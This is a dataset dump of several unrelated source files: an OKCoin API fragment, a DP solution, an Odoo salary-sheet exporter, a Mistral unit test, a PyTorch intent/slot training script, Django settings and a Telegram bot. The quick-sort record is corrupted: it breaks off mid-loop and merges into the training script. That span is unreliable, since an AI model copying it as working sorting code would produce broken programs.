'borrow_id':borrow_id\n }\n\n params['sign'] = buildMySign(params,self.__secretkey)\n return httpPost(self.__url,REPAYMENT,params)","sub_path":"btcTradingSystem/OKCoin/Code/codebase/OKCoinSpotAPI.py","file_name":"OKCoinSpotAPI.py","file_ext":"py","file_size_in_byte":15708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"190797822","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\nmylist = list(map(int,input().strip().split()))\ndp = [1 for i in range(n)]\n\nfor i in range(n):\n for j in range(i):\n if mylist[i] < mylist[j] and dp[i] <= dp[j]:\n dp[i] = dp[j] + 1\n\nprint(max(dp))","sub_path":"단계별/동적계획법1/11722.py","file_name":"11722.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"537426398","text":"import os\nimport xlsxwriter\nfrom datetime import date\nfrom datetime import date, timedelta\nimport datetime\nimport time\nfrom odoo import models, fields, api\nfrom odoo.exceptions import Warning,ValidationError\nfrom odoo.tools import config\nimport base64\nimport string\nimport sys\n\n\n\nclass XlsxReportstatement(models.TransientModel):\n _name = 'salary.sheet'\n\n\n batch = fields.Many2one('hr.payslip.run',string=\"Payslip Batch\",required=True)\n name = fields.Char()\n file = fields.Binary('Download Report',)\n \n\n def print_report(self):\n\n data=self.batch.slip_ids\n if data:\n self.xlsx_report(data)\n else:\n raise ValidationError('Report Does Not Exist According To Given Data')\n \n\n\n def xlsx_report(self,input_records):\n with xlsxwriter.Workbook(config['data_dir']+\"/salary_sheet.xlsx\") as workbook:\n \n main_heading = workbook.add_format({\n \"bold\": 1, \n \"border\": 1,\n \"align\": 'center',\n \"valign\": 'vcenter',\n \"font_color\":'white',\n \"bg_color\": '548235',\n 'font_size': '10',\n })\n\n # Create a format to use in the merged range.\n merge_format = workbook.add_format({\n 'bold': 1,\n 'border': 1,\n 'align': 'center',\n 'valign': 'vcenter',\n 'font_size': '12',\n \"font_color\":'white',\n 'fg_color': '7030a0'})\n\n main_data = workbook.add_format({\n \"align\": 'center',\n \"valign\": 'vcenter',\n 'font_size': '8',\n })\n merge_format.set_shrink()\n main_heading.set_text_justlast(1)\n # main_data.set_border()\n worksheet = workbook.add_worksheet('Salary Sheet')\n\n head = \"Statement of salaries of employees for\" +' '+ str(self.batch.name)\n for row in range(1, 1):\n worksheet.set_row(row, 7)\n worksheet.merge_range('AA1:A1', head,merge_format)\n\n # worksheet.set_column('A:A', 10)\n # worksheet.set_column('G:G', 28)\n worksheet.set_column('B:B', 15)\n worksheet.set_column('W:AA', 15)\n worksheet.set_column('H:Q', 15)\n worksheet.write('AA2', 'Employee Name', main_heading)\n worksheet.write('Z2', 'Nationality', main_heading)\n worksheet.write('Y2', 'Job title',main_heading)\n worksheet.write('X2', 'Functional code',main_heading)\n worksheet.write('W2', 'Basic Salary',main_heading)\n worksheet.merge_range('U2:V2','Overtime',main_heading)\n worksheet.write('V3', 'Hour',main_heading)\n worksheet.write('U3', 'Time',main_heading)\n worksheet.merge_range('R2:T2','Absence',main_heading)\n worksheet.write('R3', 'Minute',main_heading)\n worksheet.write('S3', 'Hour',main_heading)\n worksheet.write('T3', 'Day',main_heading)\n worksheet.merge_range('H2:Q2','Allowances',main_heading)\n worksheet.write('H3', 'Total',main_heading)\n worksheet.write('I3', 'Overtime Amount',main_heading)\n worksheet.write('J3', 'Other',main_heading)\n worksheet.write('K3', 'Food',main_heading)\n worksheet.write('L3', 'Assignment',main_heading)\n worksheet.write('M3', 'Job of Title',main_heading)\n worksheet.write('N3', 'Telephone',main_heading)\n worksheet.write('O3', 'Housing',main_heading)\n worksheet.write('P3', 'Transportation',main_heading)\n worksheet.write('Q3', 'Basic Salary',main_heading)\n worksheet.merge_range('C2:G2','Deduction',main_heading)\n worksheet.write('C3', 'Total',main_heading)\n worksheet.write('D3', 'Other',main_heading)\n worksheet.write('E3', 'GOSI',main_heading)\n worksheet.write('F3', 'Absence',main_heading)\n worksheet.write('G3', 'Advance',main_heading)\n worksheet.write('B2', 'Net Receivable',main_heading)\n worksheet.write('A2', 'Notes',main_heading)\n\n\n row = 3\n col = 0\n records = input_records\n\n basic = 0\n trans = 0\n house = 0\n tele = 0\n job = 0\n assign = 0\n food = 0\n other = 0\n over = 0\n gosi = 0\n net = 0\n\n for x in records:\n # name = str(x.employee_id.name).encode('utf-8').strip()\n worksheet.write_string (row, col+26,'{0}'.decode('utf-8').format(x.employee_id.name),main_data)\n # worksheet.write_string (row, col+25,'{0}'.decode('utf-8').format(x.employee_id.ar_country_id),main_data)\n # worksheet.write_string (row, col+24,'{0}'.decode('utf-8').format(x.employee_id.ar_designation),main_data)\n # worksheet.write_string (row, col+23,'{0}'.decode('utf-8').format(x.employee_id.pin),main_data)\n def get_basic(attr):\n contract = self.env['hr.contract'].search([('employee_id.id','=',attr)],limit=1)\n\n return contract.wage\n\n def get_trans():\n trans = 0\n house = 0\n tele = 0\n job = 0\n assign = 0\n food = 0\n other = 0\n over = 0\n gosi = 0\n net = 0\n for y in x.line_ids:\n if y.code == 'Transportation Allowance Employee':\n trans = y.total\n if y.code == 'HouseRentAllowanceUnMaried' or y.code == 'HRAUNMARRIED01':\n house = y.total\n if y.code == 'Telephone Allowance' or y.code == 'Telephone Allowance 70SR':\n tele = y.total\n if y.code == 'Job Title Allowance':\n job = y.total\n if y.code == 'assign':\n assign = y.total\n if y.code == 'Food Allowance':\n food = y.total\n if y.code == 'other':\n other = y.total\n if y.code == 'overtime':\n over = y.total\n if y.code == 'EMPGOSI':\n gosi = y.total\n if y.code == 'NET':\n net = y.total\n\n\n return trans,house,tele,job,assign,food,other,over,gosi,net\n\n worksheet.write_string (row, col+22,str(get_basic(x.employee_id.id)),main_data)\n worksheet.write_string (row, col+15,str(get_trans()[0]),main_data)\n worksheet.write_string (row, col+14,str(get_trans()[1]),main_data)\n worksheet.write_string (row, col+13,str(get_trans()[2]),main_data)\n worksheet.write_string (row, col+12,str(get_trans()[3]),main_data)\n worksheet.write_string (row, col+11,str(get_trans()[4]),main_data)\n worksheet.write_string (row, col+10,str(get_trans()[5]),main_data)\n worksheet.write_string (row, col+9,str(get_trans()[6]),main_data)\n worksheet.write_string (row, col+8,str(get_trans()[7]),main_data)\n worksheet.write_string (row, col+4,str(get_trans()[8]),main_data)\n worksheet.write_string (row, col+4,str(get_trans()[8]),main_data)\n worksheet.write_string (row, col+1,str(get_trans()[9]),main_data)\n\n basic = basic + get_basic(x.employee_id.id)\n trans = trans + get_trans()[0]\n house = house + get_trans()[1]\n tele = tele + get_trans()[2]\n job = job + get_trans()[3]\n assign = assign + get_trans()[4]\n food = food + get_trans()[5]\n other = other + get_trans()[6]\n over = over + get_trans()[7]\n gosi = gosi + get_trans()[8]\n net = net + get_trans()[9]\n\n row += 1\n\n loc = 'X'+str(row+1)\n loc1 = 'AA'+str(row+1)\n end_loc = str(loc)+':'+str(loc1)\n worksheet.merge_range(str(end_loc), 'Total' ,main_heading)\n locw = 'W'+str(row+1)\n worksheet.write_string(str(locw),str(basic),main_heading)\n locp = 'P'+str(row+1)\n worksheet.write_string(str(locp),str(trans),main_heading)\n loco = 'O'+str(row+1)\n worksheet.write_string(str(loco),str(house),main_heading)\n locn = 'N'+str(row+1)\n worksheet.write_string(str(locn),str(tele),main_heading)\n locm = 'M'+str(row+1)\n worksheet.write_string(str(locm),str(job),main_heading)\n locl = 'L'+str(row+1)\n worksheet.write_string(str(locl),str(assign),main_heading)\n lock = 'K'+str(row+1)\n worksheet.write_string(str(lock),str(food),main_heading)\n locj = 'J'+str(row+1)\n worksheet.write_string(str(locj),str(other),main_heading)\n loci = 'I'+str(row+1)\n worksheet.write_string(str(loci),str(over),main_heading)\n loce = 'E'+str(row+1)\n worksheet.write_string(str(loce),str(gosi),main_heading)\n locb = 'B'+str(row+1)\n worksheet.write_string(str(locb),str(net),main_heading)\n\n loceo = 'C'+str(row+4)\n loceo1 = 'D'+str(row+4)\n end_loceo = str(loceo)+':'+str(loceo1)\n worksheet.merge_range(str(end_loceo), 'CEO' ,main_heading)\n locHR = 'H'+str(row+4)\n locHR1 = 'I'+str(row+4)\n end_locHR = str(locHR)+':'+str(locHR1)\n worksheet.merge_range(str(end_locHR), 'HR Management' ,main_heading)\n locR = 'R'+str(row+4)\n locT = 'T'+str(row+4)\n end_locRT = str(locR)+':'+str(locT)\n worksheet.merge_range(str(end_locRT), 'Financial Management' ,main_heading)\n locX = 'X'+str(row+4)\n locY = 'Y'+str(row+4)\n end_locXY = str(locX)+':'+str(locY)\n worksheet.merge_range(str(end_locXY), 'Preparing' ,main_heading)\n\n\n \n \n\n def get_report(self):\n self.print_report()\n data_file = open(config['data_dir'] + \"/salary_sheet.xlsx\", \"rb\")\n out = data_file.read()\n data_file.close()\n self.name = 'Salary Sheet' +' '+ self.batch.name + ' '+'.xlsx'\n self.file = base64.b64encode(out)\n return {\n \"type\": \"ir.actions.do_nothing\",\n }\n","sub_path":"salary_sheet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"80660342","text":"# Copyright 2014 - Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom mistral.actions.openstack.action_generator import generators\nfrom mistral.actions.openstack import actions\nfrom mistral.tests import base\n\n\nclass GlanceGeneratorTest(base.BaseTest):\n def test_generator(self):\n action_name = \"glance.images_list\"\n generator = generators.GlanceActionGenerator\n action_classes = generator.create_actions()\n action = self._assert_single_item(\n action_classes,\n name=action_name\n )\n\n self.assertIsNotNone(generator)\n self.assertTrue(issubclass(action['class'], actions.GlanceAction))\n self.assertEqual(\"images.list\", action['class'].client_method_name)\n","sub_path":"mistral/tests/unit/actions/openstack/test_glance_generator.py","file_name":"test_glance_generator.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"136516207","text":"\n#快速排序法\ndef quick_sort(li,start,end):\n mid=li[start]\n left=start\n right=end\n if start>=end:\n return\n while left< right:\n while left=mid:\n right-=1\n li[left]=li[right]\n while left Seq2Intent\n EncoderRNN、AttnSlot、DecoderSlot -> Seq2Slot\n Seq2Intent、Seq2Slot -> Seq2Seq\n :return:\n \"\"\"\n encoder = EncoderRNN(input_size=WORDSIZE, emb_size=EMBEDDSIZE, pading_idx=WPAD_SIGN, hidden_size=LSTMHIDSIZE, n_layers=NLAYER, dropout=DROPOUT, bidirectional=BIDIRECTIONAL)\n\n attnIntent = AttnIntent()\n attnSlot = AttnSlot()\n\n decoderIntent = DecoderIntent(hidden_size=LSTMHIDSIZE * MULTI_HIDDEN, intent_size=INTENTSIZE)\n decoderSlot = DecoderSlot(hidden_size=LSTMHIDSIZE * MULTI_HIDDEN, slot_size=SLOTSIZE)\n\n crf = SlotCRF(num_tags=SLOTSIZE)\n\n seq2Intent = Seq2Intent(dec_intent=decoderIntent, attn_intent=attnIntent)\n seq2Slots = Seq2Slots(dec_slot=decoderSlot, attn_slot=attnSlot, crf=crf, hidden_size=LSTMHIDSIZE * MULTI_HIDDEN)\n\n model = Seq2Seq(encoder=encoder, seq2Intent=seq2Intent, seq2Slots=seq2Slots)\n model = model.cuda() if torch.cuda.is_available() else model\n if isTrain:\n model.apply(init_weights)\n return model\n\n\n\"\"\" 设定模型优化器 \"\"\"\ndef initOptimize(model):\n return optim.Adam(model.parameters(), lr=LEARNINGRATE)\n\n\"\"\" 设定损失函数 \"\"\"\ndef initLossFunction(PAD_IDX=-100):\n return nn.CrossEntropyLoss(ignore_index=PAD_IDX)\n\n\"\"\" 训练 \"\"\"\ndef train(iter, model=None, optimizer=None, isTrainSlot=True, isTrainIntent=True):\n ''' 读取数据 '''\n dataSeqIn, dataSeqOut, dataIntent = getData(trainDir) # 获取原数据\n dictWord = getWordDictionary(dataSeqIn) # 获取词典 (word2index, index2word)\n dictSlot = getSlotDictionary(dataSeqOut) # 获取词槽标签字典 (slot2index, index2slot)\n dictIntent = getIntentDictionary(dataIntent) # 获取意图标签字典 (intent2index, index2intent)\n pairs = makePairs(dataSeqIn, dataSeqOut, dataIntent) # 根据原数据生成样例对 zip(dataSeqIn, dataSeqOut, dataIntent)\n pairsIded = transIds(pairs, dictWord[0], dictSlot[0], dictIntent[0]) # 将字词都转换为数字id\n # pairsIdedPaded = pad(pairsIded) # 对数据进行pad填充与长度裁剪\n trainIterator = splitData(pairsIded) # 讲样例集按BATCHSIZE大小切分成多个块\n trainIterator = trainIterator[:len(trainIterator) - len(trainIterator) // 10]\n\n ''' 设定字典大小参数 '''\n WORDSIZE = len(dictWord[0])\n SLOTSIZE = len(dictSlot[0])\n INTENTSIZE = len(dictIntent[0])\n\n ''' 定义模型、优化器、损失函数 '''\n model = initModel(WORDSIZE, SLOTSIZE, INTENTSIZE) if model == None else model # 初始化并返回模型\n\n optimizer = initOptimize(model) if optimizer == None else optimizer # 初始化并返回优化器\n criterionIntent = initLossFunction() # 初始化并返回损失函数 -- 意图\n criterionSlot = initLossFunction(SPAD_SIGN) # 初始化并返回损失函数 -- 词槽\n\n ''' 模型训练 '''\n model.train() # 设定模型状态为训练状态\n epoch_lossIntent = 0 # 定义总损失\n epoch_lossSlot = 0\n epoch_lossCRF = 0\n for epoch, batch in tqdm.tqdm(enumerate(trainIterator)):\n MAXLEN = getMaxLengthFromBatch(batch, ADDLENGTH)\n lLensSeqin = getSeqInLengthsFromBatch(batch, ADDLENGTH, MAXLEN=MAXLEN)\n batch = padBatch(batch, ADDLENGTH, MAXLEN_TEMP=MAXLEN) # 按照一个batch一个batch的进行pad\n BatchSeqIn = batch[0] # 文本序列\n BatchSeqOut = batch[1] # 词槽标签序列\n BatchIntent = batch[2] # 意图标签\n BatchSeqIn, BatchSeqOut, BatchIntent = vector2Tensor(BatchSeqIn, BatchSeqOut, BatchIntent)\n\n optimizer.zero_grad()\n\n outputs, slot_crf = model(seqIn=BatchSeqIn, seqOut=BatchSeqOut, lLensSeqin=lLensSeqin)\n outputIntent = outputs[0]\n outputSlots = outputs[1]\n\n BatchSeqOut = BatchSeqOut.view(BatchSeqOut.size(0) * BatchSeqOut.size(1))\n outputSlots = outputSlots.view(outputSlots.size(0) * outputSlots.size(1), SLOTSIZE)\n\n lossIntent = criterionIntent(outputIntent, BatchIntent)\n lossSlot = criterionSlot(outputSlots, BatchSeqOut)\n\n loss = lossIntent * 0\n loss = loss + lossIntent if isTrainIntent == True else loss\n loss = loss + lossSlot if isTrainSlot == True else loss\n loss = loss - slot_crf / BATCHSIZE\n loss.backward()\n\n torch.nn.utils.clip_grad_norm_(model.parameters(), CLIP)\n optimizer.step()\n\n epoch_lossIntent += lossIntent.item()\n epoch_lossSlot += lossSlot.item()\n epoch_lossCRF -= slot_crf.item()\n # import time\n # time.sleep(0.4)\n # print(\"iter=%d, epoch=%d / %d: MAXLEN = %d; trainLoss = %f、 intentLoss = %f、 slotLoss = %f、crfLoss = %f \" % (iter, epoch, len(trainIterator), MAXLEN, loss.item(), lossIntent, lossSlot, -slot_crf))\n\n return (epoch_lossIntent / len(trainIterator), epoch_lossSlot / len(trainIterator), epoch_lossCRF / len(trainIterator)), model, optimizer, (dictWord, dictSlot, dictIntent)\n\ndef evaluate(model, dicts):\n\n ''' 读取数据 '''\n dataSeqIn, dataSeqOut, dataIntent = getData(validDir) # 获取原数据\n dictWord = dicts[0] # 获取词典 (word2index, index2word)\n dictSlot = dicts[1] # 获取词槽标签字典 (slot2index, index2slot)\n dictIntent = dicts[2] # 获取意图标签字典 (label2index, index2label)\n pairs = makePairs(dataSeqIn, dataSeqOut, dataIntent) # 根据原数据生成样例对 zip(dataSeqIn, dataSeqOut, dataIntent)\n pairsIded = transIds(pairs, dictWord[0], dictSlot[0], dictIntent[0]) # 将字词都转换为数字id\n\n validIterator = splitData(pairsIded) # 讲样例集按BATCHSIZE大小切分成多个块\n\n ''' 设定字典大小参数 '''\n WORDSIZE = len(dictWord[0])\n SLOTSIZE = len(dictSlot[0])\n INTENTSIZE = len(dictIntent[0])\n\n criterionIntent = initLossFunction() # 初始化并返回损失函数 -- 意图\n criterionSlot = initLossFunction(SPAD_SIGN) # 初始化并返回损失函数 -- 词槽\n ''' 模型验证 '''\n model.eval()\n epoch_lossIntent = 0\n epoch_lossSlot = 0\n epoch_lossCRF = 0\n with torch.no_grad():\n for i, batch in enumerate(validIterator):\n MAXLEN = getMaxLengthFromBatch(batch, ADDLENGTH)\n lLensSeqin = getSeqInLengthsFromBatch(batch, ADDLENGTH, MAXLEN=MAXLEN)\n batch = padBatch(batch, ADDLENGTH, MAXLEN_TEMP=MAXLEN) # 按照一个batch一个batch的进行pad\n BatchSeqIn = batch[0] # 文本序列\n BatchSeqOut = batch[1] # 词槽标签序列\n BatchIntent = batch[2] # 意图标签\n BatchSeqIn, BatchSeqOut, BatchIntent = vector2Tensor(BatchSeqIn, BatchSeqOut, BatchIntent)\n\n outputs, slot_crf = model(seqIn=BatchSeqIn, seqOut=BatchSeqOut, lLensSeqin=lLensSeqin)\n outputIntent = outputs[0]\n outputSlots = outputs[1]\n\n BatchSeqOut = BatchSeqOut.view(BatchSeqOut.size(0) * BatchSeqOut.size(1))\n outputSlots = outputSlots.view(outputSlots.size(0) * outputSlots.size(1), SLOTSIZE)\n\n lossIntent = criterionIntent(outputIntent, BatchIntent)\n lossSlot = criterionSlot(outputSlots, BatchSeqOut)\n\n epoch_lossIntent += lossIntent.item()\n epoch_lossSlot += lossSlot.item()\n epoch_lossCRF -= slot_crf.item()\n return (epoch_lossIntent / len(validIterator), epoch_lossSlot / len(validIterator), epoch_lossCRF / len(validIterator))\n\n\nif __name__ == '__main__':\n modelBest = None\n model = None\n optimizer = None\n lossMin = 100\n\n for iter in range(TRAINITER):\n trainLoss, model, optimizer, dicts = train(iter, model=model, optimizer=optimizer, isTrainIntent=True, isTrainSlot=True)\n\n validLoss = evaluate(model, dicts)\n print(\"iter %d / %d: trainLoss = (intent=%f, slot=%f, crf=%f), validLoss = (intent=%f, slot=%f, crf=%f)\" %\n (iter, TRAINITER, trainLoss[0], trainLoss[1], trainLoss[2], validLoss[0], validLoss[1], validLoss[2]))\n\n\n if validLoss[2] < lossMin:\n lossMin = validLoss[2]\n modelBest = model\n save_model(modelBest, dicts, modelDir + \"/crf\", \"crf.model\", \"crf.json\")\n test()","sub_path":"SimpleQA/crf/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"122544724","text":"import environ\nfrom unipath import Path\n\nROOT_DIR = Path(__file__).ancestor(3)\nAPPS_DIR = ROOT_DIR.child('apps')\nenv = environ.Env(DEBUG=(bool, False),)\nenviron.Env.read_env('../.env')\n\nSECRET_KEY = env('DJANGO_SECRET_KEY')\nDEBUG = env.bool('DJANGO_DEBUG', default=False)\nADMINS = (\n (env.str('DJANGO_ADMIN_NAME'), env.str('DJANGO_ADMIN_MAIL')),\n)\nMANAGERS = ADMINS\n\n# Apps\nADMIN_DASHBOARD = []\nDJANGO_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n]\nTHIRD_PARTY_APPS = [\n 'social_django',\n 'corsheaders',\n 'graphene_django',\n 'rest_framework',\n 'rest_framework.authtoken',\n 'djoser'\n]\nLOCAL_APPS = [\n 'apps.commons.config.CommonsConfig',\n 'apps.profiles.config.ProfilesConfig',\n 'apps.capine.config.CapineConfig',\n 'apps.productividad.config.ProductividadConfig',\n 'apps.ccc.config.CccConfig',\n 'apps.encuestas.config.EncuestasConfig'\n]\nINSTALLED_APPS = ADMIN_DASHBOARD + DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\n# Otras configuraciones\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'whitenoise.middleware.WhiteNoiseMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'spa.middleware.SPAMiddleware',\n]\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n APPS_DIR.child('templates')\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nROOT_URLCONF = 'core.urls'\nWSGI_APPLICATION = 'core.wsgi.application'\n\nDATABASES = {\n 'default': env.db('DATABASE_URL'),\n}\nDATABASES['default']['ATOMIC_REQUESTS'] = True\n\nLANGUAGE_CODE = 'es'\nTIME_ZONE = 'Mexico/General'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSITE_ID = 1\n\nSTATIC_ROOT = APPS_DIR.child('assets')\nSTATIC_URL = '/assets/'\nSTATICFILES_DIRS = (\n str(APPS_DIR.child('static')),\n)\n\nMEDIA_ROOT = APPS_DIR.child('media')\nMEDIA_URL = '/media/'\n\nGRAPHENE = {\n 'schema': 'core.schema.schema',\n}\n\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_USE_TLS = True\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_HOST_USER = env('EMAIL_HOST_USER')\nEMAIL_HOST_PASSWORD = env('EMAIL_HOST_PASSWORD')\nEMAIL_PORT = 587\n","sub_path":"src/core/config/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"21674537","text":"import time\nimport telegram\nfrom telegram import KeyboardButton, ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton, User\nfrom Erie.core.core import Core\nfrom Erie.database.worker import Worker\n\ndef GetDataInUpdater(updater):\n result = {\n \"chat_id\": None,\n \"msg_id\": None,\n \"msg_text\": None,\n \"user_id\": None,\n \"username\": None,\n \"firstname\": None,\n \"lang\": None\n }\n\n if updater.message is not None:\n result[\"chat_id\"] = updater.message.chat_id\n result[\"msg_id\"] = updater.message.message_id\n result[\"msg_text\"] = updater.message.text\n result[\"user_id\"] = updater.message.from_user.id\n result[\"username\"] = updater.message.from_user.username\n result[\"firstname\"] = updater.message.from_user.first_name\n result[\"lang\"] = updater.message.from_user.language_code\n else:\n result[\"chat_id\"] = updater.callback_query.message.chat_id\n result[\"msg_id\"] = updater.callback_query.message.message_id\n result[\"msg_text\"] = updater.callback_query.message.text\n result[\"user_id\"] = updater.callback_query.from_user.id\n result[\"username\"] = updater.callback_query.from_user.username\n result[\"firstname\"] = updater.callback_query.from_user.first_name\n result[\"lang\"] = updater.callback_query.from_user.language_code\n\n return result\n\ndef GetStateUser(userId):\n return Worker(\"tg\").GetUserStateFromId(userId)\n\ndef SetStateUser(userId, value):\n return Worker(\"tg\").SetUserStateFromId(userId, value)\n\ndef Start(updater, context):\n data = GetDataInUpdater(updater)\n\n stiсker_data = \"\"\n text_data = \"\"\n text_set_lang = \"\"\n btns = []\n\n if Worker(\"tg\").AddUser(data[\"user_id\"], data[\"firstname\"], data[\"username\"]) == 1:\n localizationType = Core.GetLocalizationTypes()\n\n for key in localizationType.keys():\n btns.append(InlineKeyboardButton(text=localizationType[key], callback_data=key))\n\n stiсker_data = Core.GetSource(\"telegram_stiсkers_data\", \"Hello\")\n text_data = Core.GetRandomLocalizationString(\"ru_ru\", \"FirstEntry\")\n text_set_lang = Core.GetRandomLocalizationString(\"ru_ru\", \"SetLang\")\n else:\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n desired_name = Worker(\"tg\").GerDesiredName(data[\"user_id\"])\n\n stiсker_data = Core.GetSource(\"telegram_stiсkers_data\", \"Hello\")\n text_data = Core.GetRandomLocalizationString(locate, \"Hello\").format(desired_name)\n\n\n context.bot.send_sticker(chat_id=data[\"chat_id\"], sticker=stiсker_data)\n\n context.bot.send_message(text=text_data, chat_id=data[\"chat_id\"])\n\n if len(btns) > 0:\n context.bot.send_message(text=text_set_lang, chat_id=data[\"chat_id\"], reply_markup=InlineKeyboardMarkup([btns]))\n else:\n AddProductsButtonsInBusket(updater, context)\n\n\ndef AnsverForText(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n source = Core.GetLocalizationAnsverType(locate)\n desired_name = Worker(\"tg\").GerDesiredName(data[\"user_id\"])\n stiсker_data = \"\"\n msg_text = \"\"\n\n # Temp code\n if Core.GetRandomLocalizationString(locate, \"StartOrder\") == data[\"msg_text\"]:\n GetProductsFromUser(updater, context, \"types\")\n return\n if Core.GetRandomLocalizationString(locate, \"HistoryOrder\") == data[\"msg_text\"]:\n GetOrders(updater, context)\n return\n\n # Dance)\n if data[\"msg_text\"] in source[\"Question\"][0]:\n stiсker_data = Core.GetSource(\"telegram_stiсkers_data\", \"Dance\")\n audio = {\"audio\": Core.GetVoiceAndMusicInSource(\"\")}\n context.bot.send_sticker(chat_id=data[\"chat_id\"], sticker=stiсker_data)\n context.bot.send_message(chat_id=data[\"chat_id\"], text=\"Тут должна быть музыка\", file=audio)\n return\n\n for i in range(0, len(source[\"Question\"])):\n if data[\"msg_text\"] in source[\"Question\"][i]:\n ansver_data = Core.GetRandomLocalizationAnsver(locate, i)\n msg_text = ansver_data[0].format(desired_name)\n stiсker_name = ansver_data[1]\n\n context.bot.send_chat_action(chat_id=data[\"chat_id\"], action=telegram.ChatAction.TYPING)\n time.sleep(2)\n if stiсker_name != \"\":\n stiсker_data = Core.GetSource(\"telegram_stiсkers_data\", stiсker_name)\n context.bot.send_sticker(chat_id=data[\"chat_id\"], sticker=stiсker_data)\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n return\n\n msg_text = Core.GetRandomLocalizationString(locate, \"ErrorUnderstandMsg\")\n stiсker_data = Core.GetSource(\"telegram_stiсkers_data\", \"Whot\")\n context.bot.send_chat_action(chat_id=data[\"chat_id\"], action=telegram.ChatAction.TYPING)\n\n time.sleep(2)\n context.bot.send_sticker(chat_id=data[\"chat_id\"], sticker=stiсker_data)\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n\ndef AnsverForRestType(updater, context):\n data = GetDataInUpdater(updater)\n\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n text_data = Core.GetRandomLocalizationString(locate, \"DontAnderstandThisTypeMsg\")\n stiсker_data = Core.GetSource(\"telegram_stiсkers_data\", \"Whot\")\n\n context.bot.send_chat_action(chat_id=data[\"chat_id\"], action=telegram.ChatAction.TYPING)\n time.sleep(1)\n context.bot.send_sticker(chat_id=data[\"chat_id\"], sticker=stiсker_data)\n context.bot.send_message(chat_id=data[\"chat_id\"], text=text_data)\n\ndef SetLangForUser(updater, context):\n data = GetDataInUpdater(updater)\n\n locate = updater.callback_query.data\n\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n Worker(\"tg\").SetLocateFromUser(data[\"user_id\"], locate)\n\n # Start buttons\n AddProductsButtonsInBusket(updater, context)\n\ndef CreateBtnSenderPhoneNumber(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n send_phone_number = KeyboardButton(text=Core.GetRandomLocalizationString(locate, \"SendPhoneNumber\"), request_contact=True)\n\n btnsList = [[send_phone_number]]\n markup = ReplyKeyboardMarkup(btnsList, resize_keyboard=True, one_time_keyboard=True)\n\n text = Core.GetRandomLocalizationString(locate, \"SendMePhone\")\n context.bot.send_message(text=text, reply_markup=markup, chat_id=data[\"chat_id\"])\n\n\ndef GetUserPhoneNumber(updater, context):\n pass\n\ndef SetUserLocation(updater, context):\n data = GetDataInUpdater(updater)\n\n longtude, latitude = updater.message.location.longitude, updater.message.location.latitude\n\n msg_text = Core.GetAddressFromCoords(longtude, latitude)\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n\ndef AddProductsButtonsInBusket(updater, context):\n data = GetDataInUpdater(updater)\n\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n start_order = KeyboardButton(Core.GetRandomLocalizationString(locate, \"StartOrder\"))\n history_order = KeyboardButton(Core.GetRandomLocalizationString(locate, \"HistoryOrder\"))\n\n btnsList = [[start_order]]\n if Worker(\"tg\").UserHaveProductsInBascet(data[\"user_id\"]):\n btnsList.append([history_order])\n markup = ReplyKeyboardMarkup(btnsList, resize_keyboard=True, one_time_keyboard=True)\n\n text = Core.GetRandomLocalizationString(locate, \"GoodAddMainInformation\")\n\n context.bot.send_message(text=text, reply_markup=markup, chat_id=data[\"chat_id\"])\n\ndef SelectedProductsType(updater, context):\n data = GetDataInUpdater(updater)\n result = 